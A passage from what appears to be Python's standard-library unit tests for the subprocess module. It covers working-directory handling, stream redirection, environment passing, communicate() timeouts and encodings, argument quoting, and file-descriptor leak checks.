# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
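# cwd may also be given as a bytes path.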
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
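# cwd may also be given as a path-like object.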
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
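# stdout=DEVNULL discards the child's output and leaves p.stdout as None.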
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
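# stderr=DEVNULL discards the child's stderr and leaves p.stderr as None.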
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
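# stdin=DEVNULL gives the child an immediate EOF on stdin and leaves p.stdin as None.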
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
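# A variable added to a copy of os.environ is visible to the child.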
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys macOS insists
# on adding even when the environment passed to exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
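# communicate() writes the given bytes to the child's stdin and closes it.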
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
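# communicate() returns captured stdout and None for the non-redirected stderr.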
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
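# communicate() returns captured stderr and None for the non-redirected stdout.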
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
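# communicate() feeds stdin and collects stdout and stderr in a single call.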
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build writes something like "[42442 refs]\n"
# to stderr when the subprocess exits.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# Testing UTF-16 (with BOM) and UTF-32-BE (without BOM) covers both
# the BOM and no-BOM cases as well as the UTF-16 and UTF-32 families.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
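# poll() returns None while the child is running and the exit code afterwards.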
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# The line is flushed in text mode with bufsize=1,
# so we should get the full line in return.
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# The line is not flushed in binary mode with bufsize=1,
# so we should get an empty response.
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must properly close its pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing-sensitive test; the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread (one that doesn't actually have it),
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
